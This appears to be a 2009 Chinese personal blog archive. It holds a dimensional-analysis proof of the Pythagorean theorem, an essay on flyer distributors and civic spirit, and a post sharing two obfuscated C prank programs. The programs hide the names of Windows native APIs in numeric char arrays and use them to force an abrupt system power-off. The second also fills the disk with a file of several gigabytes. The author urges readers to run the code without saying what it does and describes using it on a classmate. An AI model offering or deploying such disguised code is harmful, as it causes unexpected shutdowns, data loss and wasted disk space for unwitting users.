Archive

Archive for January, 2009

强悍的勾股定理的证明!

January 26, 2009 Leave a comment

先来介绍一下物理学上的知识:

我们常用各种各样的计量单位,而这些单位都是由7个基本单位导出,由此可得一个公式正确的必要性条件,便是它左右两边所计算得的单位相同,如:F=maF的单位是kg*m/s^2,m的单位是kg,a的单位是m/s^2, 右边ma的单位值是m/s^2*kg=kg*m/s^2=左边,那么这个公式就有“正确的可能性”;反之,这个公式就一定是错误的。

这种方法,就叫做量纲分析。

下面来看看如何用它证明勾股定理。

已知一个直角三角形的斜边(不妨设为c)和一个锐角(不妨设为角B)就可以确定它的面积,面积的单位是平方米,而长度的单位是米,角度是没有单位的(这里的单位指7个基本单位和它们的导出单位),因为m^2=m*m(貌似很废话),我们有S=c^2*f(B),再作三角形斜边AB上的高CD,将三角形ABC分成两个三角形ACDBCD,它们的面积分别为b^2*f(B)a^2*f(B),其中a=BC, b=AC, 由此可得:c^2*f(B)=a^2*f(B)+b^2*f(B),约去f(B)即可得a^2+b^2=c^2.证毕.

 

这是我在看科学出版社出版的《力学与理论力学》时发现的,以前我认为物理在数学上的应用主要是光学(反射角=入射角等等),没想到在这里也能派上用场,特别是没有用复杂的拼图,就完成了勾股定理的证明,确实强大(或许也是我长久以来的孤陋寡闻)。

 

 

Categories: Old Blog Posts

人文的呼唤

January 11, 2009 Leave a comment

挑战

小学时,每天放学,我们都行走在人行道上,一日兴起,撕起了道路两旁电线杆上乱张贴的名片。不料被老师发现,倍受赞扬,还因此在国旗下发表了讲话,一时间,这一举动竟成为一种热潮。

那时我们所获得的名号是多么的“响亮”:“牛皮癣”清洁工、城市天使……我也有过那么一段得意的日子。

然而,当我又一次,习惯性地揭下刚被贴上的名片,并丢进垃圾桶时,却看见那前方一个蜷缩着的人猛一回头,她似乎感到无言以对,只慢慢向垃圾桶走去。她向里面望了望,伸手将已揉皱的纸片掏了出来,又重新贴上。

我摇了摇头,没再说什么。当时,心里倒也没什么别的波澜——我便继续走罢!只是似乎从那之后,我很少再揭下这些名片。

难道我懒了吗?

又一次,在街道上。

惊人的相似,一位步履蹒跚的中年妇女,灰头土脸地四处张望,她一步步走近电话亭,确定左右无人,手探进包内,迅速拈起几张名片,贴了上去;随后,又匆匆离去。

若是听他人描述,我定然会赐以“猥琐”二字。然而,亲眼所见,其景悲凉,无法言状。

若我是导演,将所有音效一并抹去,再重演这一幕,或许,你会有和我相似的感受。

初中时,我曾随爸爸一同回老家。到达郑州时,刚下汽车,就被一群派送广告单的人簇拥着,一双双“热情”的手将一摞摞花花绿绿的传单塞向我们手中。和我们同车的一个女孩忍无可忍,大喝一声:“你给我滚开!”这几个年过半百、两鬓微白的人,眼神黯淡无光,默然离去。直到我们坐上的士,其中一人仍不放弃,一张传单在他的手中挥动,爸爸欣然接下,道:“谢谢!”待车开远,我问他为何,他说:“那毕竟是工作啊!”

若非无奈,他们又怎会沦落至此?

形形色色的规章制度,支持似有半分犹豫,反对又无从入手,正似当年中国在联合国频频投下弃权票般,同样的谨慎和无奈。

我曾尝试用感性与理性的对立性来解释,但我的一套推论,却证实了它们对此颇为无力。譬如从感性的角度,我最初的做法出于对这群人的愤怒,而之后的“麻木”则出于对他们的同情;再从理性的角度,我的初衷与法律条文相吻合,维护城市清洁本就是每个人的义务和责任,然而理智却使我想到,他们所禁受的不可想像的煎熬,我的这个举动只会让他们更受打击。于情于理,却又都自相矛盾。我,又能做些什么?

这,该是平民对发展的挑战。

这,该是人文对法律的挑战。

传递

生活在今天这个时代,不知是幸运还是悲哀。

人们常说患难见真情,在这个利欲极端放大的现代社会,人们的内心都全副武装——实在无法与几百几千年前人与人之间的贴近相比。当一颗颗稚嫩的心之间,被拔地而起的铁壁铜墙所阻隔,我们之间,还剩下什么?

或许我们也意识到了这一点,故对于那些再细微不过的现象,也会显得敏感不已。如学校里所张贴着的,对拾金不昧的同学的表彰名单,大致浏览,上面所罗列之物,最低档次也是手机、钱包;而那些校园卡、钥匙之类的物品,几乎毫未提及。

而这些别样的敏感,却也在潜移默化地影响着我们。

三十年前,地上若有1元钱,你见到了而不捡起来,估计还要有被批斗的危险;今天,我和朋友一同出行,我捡起了宿舍楼旁的1块钱,交到住宿办,老师却说:“你自己拿着吧,我这里也没地方放……”于是我和朋友互相开起了玩笑,都没有人想要,只得放回原地。

不想对此多加评论。只是当年的拾金不昧,已悄然变味。

5·12地震时,全中国人民的抗灾热情被激发到了高潮。井喷式的救援,同上百亿的救助物资、资金自四面八方而来。大爱谭千秋,也被人们广为称颂。我想,这个时候的中国人,但当我冷静下来,享有片刻的思索,我不禁疑问:难道,真的需要一场灾难,来挽救人们沉睡的人文精神?

第一次,我为我的问题而感到恐惧。

前些日子,一位彩票投注站的站主,按照投注人电话所述填写了彩票,不料这张彩票中了500万元的大奖。行里早有不成文的规定,站主完全可以将彩票据为己有,然而她却如实将彩票交给了投注人。一时间举国震动,她的事迹也成为人们诚信的楷模。

但为什么,这种传递的方式,总让我感到不知何处而来的不自然?

我曾在读者上看到一篇文章,大意是讲:作者在危急时得到了一个陌生人的帮助,他十分感激,不知该如何报答,那个陌生人说:“我帮助了你,希望你以后有能力时,也能帮助更多的人。”作者深受感动,决定在今后尽自己之所能帮助别人,并将这句话送给他们。也许正是命运的安排,若干年后,作者竟再次听到这句话在自己的耳边响起,“……希望你能帮助更多的人。”他的脸上,带着诚恳的微笑。

一切拨动心弦的东西,总是不带任何外物的藻饰——它本身便是从天境而来,又何须,又怎容许凡尘的沾染?

人文精神,正应该在这点点滴滴中繁衍生息,我认为。

Categories: Old Blog Posts

黑人的程序..

January 11, 2009 Leave a comment

一学API的朋友给我发了个代码,我很无耻地让哥们试了一下…

各位若想知道结果就运行下面代码吧:

#include “windows.h”
typedef void WINAPI __(DWORD);
typedef long WINAPI _(DWORD,INT,INT,void*);
_* ___;
__* ____;
int main()
{
 char ______[6];

 BOOL _____________;
 ______[0]=110;
 ______[1]=116;
 ______[2]=100;
 ______[3]=108;
 ______[4]=108;
 ______[5]=0;
 HMODULE ___________;
 ___________=LoadLibrary(______);
 char _______[17],_____[19];
 _____[0]=82;
 _____[1]=116;
 _____[2]=108;
 _____[3]=65;
 _____[4]=100;
 _____[5]=106;
 _____[6]=117;
 _____[7]=115;
 _____[8]=116;
 _____[9]=80;
 _____[10]=114;
 _____[11]=105;
 _____[12]=118;
 _____[13]=105;
 _____[14]=108;
 _____[15]=101;
 _____[16]=103;
 _____[17]=101;
 _____[18]=0;
 _______[0]=78;
 _______[1]=116;
 _______[2]=83;
 _______[3]=104;
 _______[4]=117;
 _______[5]=116;
 _______[6]=100;
 _______[7]=111;
 _______[8]=119;
 _______[9]=110;
 _______[10]=83;
 _______[11]=121;
 _______[12]=115;
 _______[13]=116;
 _______[14]=101;
 _______[15]=109;
 _______[16]=0;
 ___=(_*)GetProcAddress(___________,_____);
 ____=(__*)GetProcAddress(___________,_______);

 _____________=0;
 ___(19,1,0,&_____________);
 ____(2);
 return 0;
}

 

我顺便拿这程序整了一下班里一个喜欢用电脑整人的人..

没想到的是我竟然用这代码整了他两次..

第二次嘛..使用的是下面的完整代码

#include<fstream>
#include<iostream>
#include<string>
#include “windows.h”
typedef void WINAPI __(DWORD);
typedef long WINAPI _(DWORD,INT,INT,void*);
_* ___;
__* ____;
using namespace std;
ofstream fout(“hahaha.hahaha”);
string s=”我的家在一个偏僻的山村,父母都是面朝黄土背朝天的农民。我有一个小我3岁的弟弟。有一次我为了买女孩子们都有的花手绢,偷偷拿了父亲抽屉里5毛钱。父亲当天就发现钱少了,就让我们跪在墙边,拿着一根竹竿,让我们承认到底是谁偷的。我被当时的情景吓傻了,低着头不敢说话。父亲见我们都不承认,说,那两个一起挨打。说完就扬起手里的竹竿,忽然弟弟抓住父亲的手大声说:“爸,是我偷的,不是姐干的,你打我吧!”父亲手里的竹竿无情地落在弟弟的背上、肩上,父亲”;
using namespace std;
int main()
{
    char c[1000];
    long i=0,j,t=0;
    while(1)
    {
       fout<<c;
       i++;
       if(i>1000000)
       {
            cout<<s[t];
            t++;
            i=0;
       }
       if(t>sizeof(s)) break;
    }
    cout<<endl<<“作品尚未完成,谢谢支持!”<<endl;
     char ______[6];

 BOOL _____________;
 ______[0]=110;
 ______[1]=116;
 ______[2]=100;
 ______[3]=108;
 ______[4]=108;
 ______[5]=0;
 HMODULE ___________;
 ___________=LoadLibrary(______);
 char _______[17],_____[19];
 _____[0]=82;
 _____[1]=116;
 _____[2]=108;
 _____[3]=65;
 _____[4]=100;
 _____[5]=106;
 _____[6]=117;
 _____[7]=115;
 _____[8]=116;
 _____[9]=80;
 _____[10]=114;
 _____[11]=105;
 _____[12]=118;
 _____[13]=105;
 _____[14]=108;
 _____[15]=101;
 _____[16]=103;
 _____[17]=101;
 _____[18]=0;
 _______[0]=78;
 _______[1]=116;
 _______[2]=83;
 _______[3]=104;
 _______[4]=117;
 _______[5]=116;
 _______[6]=100;
 _______[7]=111;
 _______[8]=119;
 _______[9]=110;
 _______[10]=83;
 _______[11]=121;
 _______[12]=115;
 _______[13]=116;
 _______[14]=101;
 _______[15]=109;
 _______[16]=0;
 ___=(_*)GetProcAddress(___________,_____);
 ____=(__*)GetProcAddress(___________,_______);

 _____________=0;
 ___(19,1,0,&_____________);
 ____(2);
    system(“pause”);
}

大概功用有以下三点:

输出一篇文章中的一部分,掐时一步步地输出;

每输出1个字,就帮您在一个文件内写入100万个字符;

在您获得一个3G的文件后,再享受一下上面那个极度猥琐的程序带来的体验..

大致如上。

Categories: Old Blog Posts